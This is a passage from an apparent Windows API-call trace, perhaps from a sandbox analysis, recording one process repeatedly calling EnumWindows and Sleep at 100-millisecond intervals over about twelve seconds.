(lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.606] Sleep (dwMilliseconds=0x64) [0163.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.608] Sleep (dwMilliseconds=0x64) [0163.609] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.610] Sleep (dwMilliseconds=0x64) [0163.611] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.612] Sleep (dwMilliseconds=0x64) [0163.615] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.615] Sleep (dwMilliseconds=0x64) [0163.617] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.617] Sleep (dwMilliseconds=0x64) [0163.618] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.619] Sleep (dwMilliseconds=0x64) [0163.620] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.620] Sleep (dwMilliseconds=0x64) [0163.622] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.622] Sleep (dwMilliseconds=0x64) [0163.654] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.655] Sleep (dwMilliseconds=0x64) [0163.657] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.658] Sleep (dwMilliseconds=0x64) [0163.659] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.660] Sleep (dwMilliseconds=0x64) [0163.662] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.662] Sleep (dwMilliseconds=0x64) [0163.663] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.664] Sleep (dwMilliseconds=0x64) [0163.666] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.666] Sleep (dwMilliseconds=0x64) [0163.668] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.668] Sleep (dwMilliseconds=0x64) [0163.670] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.670] Sleep (dwMilliseconds=0x64) [0163.673] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.673] Sleep (dwMilliseconds=0x64) [0163.674] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.675] Sleep (dwMilliseconds=0x64) [0163.676] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.677] Sleep (dwMilliseconds=0x64) [0163.678] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.678] Sleep (dwMilliseconds=0x64) [0163.679] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.680] Sleep (dwMilliseconds=0x64) [0163.682] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.682] Sleep (dwMilliseconds=0x64) [0163.684] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.684] Sleep (dwMilliseconds=0x64) [0163.685] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.686] Sleep (dwMilliseconds=0x64) [0163.691] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.691] Sleep (dwMilliseconds=0x64) [0163.693] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.693] Sleep (dwMilliseconds=0x64) [0163.694] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.694] Sleep (dwMilliseconds=0x64) [0163.696] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.696] Sleep (dwMilliseconds=0x64) [0163.697] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.698] Sleep (dwMilliseconds=0x64) [0163.699] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.700] Sleep (dwMilliseconds=0x64) [0163.701] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.701] Sleep (dwMilliseconds=0x64) [0163.703] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.703] Sleep (dwMilliseconds=0x64) [0163.704] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.705] Sleep (dwMilliseconds=0x64) [0163.706] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.707] Sleep (dwMilliseconds=0x64) [0163.708] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.709] Sleep (dwMilliseconds=0x64) [0163.710] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.711] Sleep (dwMilliseconds=0x64) [0163.712] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.713] Sleep (dwMilliseconds=0x64) [0163.715] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.716] Sleep (dwMilliseconds=0x64) [0163.717] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.718] Sleep (dwMilliseconds=0x64) [0163.719] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.720] Sleep (dwMilliseconds=0x64) [0163.722] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.722] Sleep (dwMilliseconds=0x64) [0163.726] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.726] Sleep (dwMilliseconds=0x64) [0163.728] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.729] Sleep (dwMilliseconds=0x64) [0163.730] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.731] Sleep (dwMilliseconds=0x64) [0163.733] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.733] Sleep (dwMilliseconds=0x64) [0163.735] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.735] Sleep (dwMilliseconds=0x64) [0163.742] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.743] Sleep (dwMilliseconds=0x64) [0163.753] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.753] Sleep (dwMilliseconds=0x64) [0163.754] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.755] Sleep (dwMilliseconds=0x64) [0163.756] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.756] Sleep (dwMilliseconds=0x64) [0163.758] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.758] Sleep (dwMilliseconds=0x64) [0163.760] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.760] Sleep (dwMilliseconds=0x64) [0163.762] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.762] Sleep (dwMilliseconds=0x64) [0163.768] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.768] Sleep (dwMilliseconds=0x64) [0163.770] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.770] Sleep (dwMilliseconds=0x64) [0163.771] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.772] Sleep (dwMilliseconds=0x64) [0163.773] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.774] Sleep (dwMilliseconds=0x64) [0163.775] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.776] Sleep (dwMilliseconds=0x64) [0163.777] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.777] Sleep (dwMilliseconds=0x64) [0163.779] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.779] Sleep (dwMilliseconds=0x64) [0163.780] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.781] Sleep (dwMilliseconds=0x64) [0163.782] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.783] Sleep (dwMilliseconds=0x64) [0163.784] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.784] Sleep (dwMilliseconds=0x64) [0163.785] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.786] Sleep (dwMilliseconds=0x64) [0163.787] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.787] Sleep (dwMilliseconds=0x64) [0163.789] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.789] Sleep (dwMilliseconds=0x64) [0163.791] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.791] Sleep (dwMilliseconds=0x64) [0163.810] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.810] Sleep (dwMilliseconds=0x64) [0163.811] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.812] Sleep (dwMilliseconds=0x64) [0163.891] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.892] Sleep (dwMilliseconds=0x64) [0163.967] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0163.967] Sleep (dwMilliseconds=0x64) [0164.042] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.043] Sleep (dwMilliseconds=0x64) [0164.131] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.132] Sleep (dwMilliseconds=0x64) [0164.226] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.226] Sleep (dwMilliseconds=0x64) [0164.302] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.302] Sleep (dwMilliseconds=0x64) [0164.379] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.380] Sleep (dwMilliseconds=0x64) [0164.409] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.418] Sleep (dwMilliseconds=0x64) [0164.467] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.476] Sleep (dwMilliseconds=0x64) [0164.534] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.534] Sleep (dwMilliseconds=0x64) [0164.556] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.557] Sleep (dwMilliseconds=0x64) [0164.576] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.577] Sleep (dwMilliseconds=0x64) [0164.694] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.694] Sleep (dwMilliseconds=0x64) [0164.772] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.772] Sleep (dwMilliseconds=0x64) [0164.811] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.812] Sleep (dwMilliseconds=0x64) [0164.889] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.890] Sleep (dwMilliseconds=0x64) [0164.974] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0164.975] Sleep (dwMilliseconds=0x64) [0165.072] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0165.072] Sleep (dwMilliseconds=0x64) [0165.147] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0165.147] Sleep (dwMilliseconds=0x64) [0165.276] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0165.277] Sleep (dwMilliseconds=0x64) [0165.355] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0165.356] Sleep (dwMilliseconds=0x64) [0165.374] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0165.379] Sleep (dwMilliseconds=0x64) [0165.437] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0165.438] Sleep (dwMilliseconds=0x64) [0165.519] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0165.520] Sleep (dwMilliseconds=0x64) [0165.574] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0165.574] Sleep (dwMilliseconds=0x64) [0165.630] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0165.631] Sleep (dwMilliseconds=0x64) [0165.714] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0165.714] Sleep (dwMilliseconds=0x64) [0165.780] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0165.781] Sleep (dwMilliseconds=0x64) [0165.853] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0165.854] Sleep (dwMilliseconds=0x64) [0165.956] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0165.957] Sleep (dwMilliseconds=0x64) [0166.030] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0166.031] Sleep (dwMilliseconds=0x64) [0166.077] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0166.077] Sleep (dwMilliseconds=0x64) [0166.147] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0166.147] Sleep (dwMilliseconds=0x64) [0166.261] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0166.262] Sleep (dwMilliseconds=0x64) [0166.327] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0166.327] Sleep (dwMilliseconds=0x64) [0166.377] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0166.378] Sleep (dwMilliseconds=0x64) [0166.470] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0166.471] Sleep (dwMilliseconds=0x64) [0166.549] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0166.550] Sleep (dwMilliseconds=0x64) [0166.598] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0166.599] Sleep (dwMilliseconds=0x64) [0166.669] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0166.670] Sleep (dwMilliseconds=0x64) [0166.743] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0166.743] Sleep (dwMilliseconds=0x64) [0166.808] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0166.809] Sleep (dwMilliseconds=0x64) [0166.857] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0166.858] Sleep (dwMilliseconds=0x64) [0166.932] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0166.932] Sleep (dwMilliseconds=0x64) [0167.085] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.086] Sleep (dwMilliseconds=0x64) [0167.128] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.131] Sleep (dwMilliseconds=0x64) [0167.199] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.201] Sleep (dwMilliseconds=0x64) [0167.283] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.285] Sleep (dwMilliseconds=0x64) [0167.325] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.326] Sleep (dwMilliseconds=0x64) [0167.380] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.381] Sleep (dwMilliseconds=0x64) [0167.457] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.458] Sleep (dwMilliseconds=0x64) [0167.524] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.524] Sleep (dwMilliseconds=0x64) [0167.558] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.558] Sleep (dwMilliseconds=0x64) [0167.621] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.622] Sleep (dwMilliseconds=0x64) [0167.702] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.702] Sleep (dwMilliseconds=0x64) [0167.763] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.764] Sleep (dwMilliseconds=0x64) [0167.814] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.815] Sleep (dwMilliseconds=0x64) [0167.888] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.888] Sleep (dwMilliseconds=0x64) [0167.960] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0167.961] Sleep (dwMilliseconds=0x64) [0168.009] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.010] Sleep (dwMilliseconds=0x64) [0168.078] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.078] Sleep (dwMilliseconds=0x64) [0168.218] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.219] Sleep (dwMilliseconds=0x64) [0168.300] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.300] Sleep (dwMilliseconds=0x64) [0168.352] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.352] Sleep (dwMilliseconds=0x64) [0168.427] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.428] Sleep (dwMilliseconds=0x64) [0168.500] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.500] Sleep (dwMilliseconds=0x64) [0168.536] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.537] Sleep (dwMilliseconds=0x64) [0168.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.609] Sleep (dwMilliseconds=0x64) [0168.657] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.661] Sleep (dwMilliseconds=0x64) [0168.676] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.676] Sleep (dwMilliseconds=0x64) [0168.703] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.703] Sleep (dwMilliseconds=0x64) [0168.744] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.744] Sleep (dwMilliseconds=0x64) [0168.783] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.784] Sleep (dwMilliseconds=0x64) [0168.793] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.793] Sleep (dwMilliseconds=0x64) [0168.828] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.828] Sleep (dwMilliseconds=0x64) [0168.868] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.869] Sleep (dwMilliseconds=0x64) [0168.878] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.878] Sleep (dwMilliseconds=0x64) [0168.942] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0168.943] Sleep (dwMilliseconds=0x64) [0169.014] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0169.015] Sleep (dwMilliseconds=0x64) [0169.072] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0169.072] Sleep (dwMilliseconds=0x64) [0169.132] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0169.132] Sleep (dwMilliseconds=0x64) [0169.225] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0169.225] Sleep (dwMilliseconds=0x64) [0169.307] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0169.307] Sleep (dwMilliseconds=0x64) [0169.347] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0169.348] Sleep (dwMilliseconds=0x64) [0169.514] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0169.514] Sleep (dwMilliseconds=0x64) [0169.596] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0169.597] Sleep (dwMilliseconds=0x64) [0169.663] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0169.664] Sleep (dwMilliseconds=0x64) [0169.731] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0169.732] Sleep (dwMilliseconds=0x64) [0169.811] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0169.811] Sleep (dwMilliseconds=0x64) [0169.890] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0169.890] Sleep (dwMilliseconds=0x64) [0169.936] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0169.937] Sleep (dwMilliseconds=0x64) [0170.019] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.020] Sleep (dwMilliseconds=0x64) [0170.072] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.072] Sleep (dwMilliseconds=0x64) [0170.197] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.198] Sleep (dwMilliseconds=0x64) [0170.266] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.276] Sleep (dwMilliseconds=0x64) [0170.353] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.353] Sleep (dwMilliseconds=0x64) [0170.432] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.433] Sleep (dwMilliseconds=0x64) [0170.481] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.481] Sleep (dwMilliseconds=0x64) [0170.553] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.553] Sleep (dwMilliseconds=0x64) [0170.629] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.630] Sleep (dwMilliseconds=0x64) [0170.692] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.693] Sleep (dwMilliseconds=0x64) [0170.759] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.760] Sleep (dwMilliseconds=0x64) [0170.815] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.816] Sleep (dwMilliseconds=0x64) [0170.835] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.835] Sleep (dwMilliseconds=0x64) [0170.874] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.897] Sleep (dwMilliseconds=0x64) [0170.954] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0170.965] Sleep (dwMilliseconds=0x64) [0171.008] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0171.009] Sleep (dwMilliseconds=0x64) [0171.049] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0171.050] Sleep (dwMilliseconds=0x64) [0171.129] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0171.130] Sleep (dwMilliseconds=0x64) [0171.229] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0171.229] Sleep (dwMilliseconds=0x64) [0171.290] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0171.291] Sleep (dwMilliseconds=0x64) [0171.360] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0171.361] Sleep (dwMilliseconds=0x64) [0171.436] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0171.437] Sleep (dwMilliseconds=0x64) [0171.508] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0171.509] Sleep (dwMilliseconds=0x64) [0171.555] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0171.556] Sleep (dwMilliseconds=0x64) [0171.716] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0171.716] Sleep (dwMilliseconds=0x64) [0171.783] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0171.783] Sleep (dwMilliseconds=0x64) [0171.857] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0171.858] Sleep (dwMilliseconds=0x64) [0171.934] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0171.935] Sleep (dwMilliseconds=0x64) [0172.019] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0172.021] Sleep (dwMilliseconds=0x64) [0172.087] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0172.087] Sleep (dwMilliseconds=0x64) [0172.222] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0172.223] Sleep (dwMilliseconds=0x64) [0172.294] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0172.294] Sleep (dwMilliseconds=0x64) [0172.342] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0172.342] Sleep (dwMilliseconds=0x64) [0172.414] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0172.415] Sleep (dwMilliseconds=0x64) [0172.487] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0172.488] Sleep (dwMilliseconds=0x64) [0172.516] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0172.517] Sleep (dwMilliseconds=0x64) [0172.581] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0172.582] Sleep (dwMilliseconds=0x64) [0172.663] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0172.663] Sleep (dwMilliseconds=0x64) [0172.727] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0172.728] Sleep (dwMilliseconds=0x64) [0172.757] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0172.758] Sleep (dwMilliseconds=0x64) [0172.829] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0172.829] Sleep (dwMilliseconds=0x64) [0172.921] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0172.922] Sleep (dwMilliseconds=0x64) [0173.015] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.016] Sleep (dwMilliseconds=0x64) [0173.057] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.058] Sleep (dwMilliseconds=0x64) [0173.116] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.129] Sleep (dwMilliseconds=0x64) [0173.223] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.224] Sleep (dwMilliseconds=0x64) [0173.281] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.282] Sleep (dwMilliseconds=0x64) [0173.337] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.338] Sleep (dwMilliseconds=0x64) [0173.422] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.422] Sleep (dwMilliseconds=0x64) [0173.491] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.491] Sleep (dwMilliseconds=0x64) [0173.512] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.512] Sleep (dwMilliseconds=0x64) [0173.563] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.563] Sleep (dwMilliseconds=0x64) [0173.653] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.654] Sleep (dwMilliseconds=0x64) [0173.674] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.674] Sleep (dwMilliseconds=0x64) [0173.704] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.705] Sleep (dwMilliseconds=0x64) [0173.748] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.749] Sleep (dwMilliseconds=0x64) [0173.800] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.800] Sleep (dwMilliseconds=0x64) [0173.828] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.829] Sleep (dwMilliseconds=0x64) [0173.866] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.866] Sleep (dwMilliseconds=0x64) [0173.899] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.899] Sleep (dwMilliseconds=0x64) [0173.906] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.906] Sleep (dwMilliseconds=0x64) [0173.950] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.950] Sleep (dwMilliseconds=0x64) [0173.989] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.989] Sleep (dwMilliseconds=0x64) [0173.998] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0173.998] Sleep (dwMilliseconds=0x64) [0174.026] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0174.026] Sleep (dwMilliseconds=0x64) [0174.067] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0174.068] Sleep (dwMilliseconds=0x64) [0174.400] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0174.401] Sleep (dwMilliseconds=0x64) [0174.672] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0174.673] Sleep (dwMilliseconds=0x64) [0175.135] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0175.136] Sleep (dwMilliseconds=0x64) [0175.330] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0175.361] Sleep (dwMilliseconds=0x64) [0175.364] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0175.368] Sleep (dwMilliseconds=0x64) [0175.435] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0175.436] Sleep (dwMilliseconds=0x64) [0175.566] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0175.567] Sleep (dwMilliseconds=0x64) [0175.630] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0175.630] Sleep (dwMilliseconds=0x64) [0175.693] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0175.694] Sleep (dwMilliseconds=0x64) [0175.825] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0175.826] Sleep (dwMilliseconds=0x64) [0175.897] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0175.898] Sleep (dwMilliseconds=0x64) [0175.939] EnumWindows 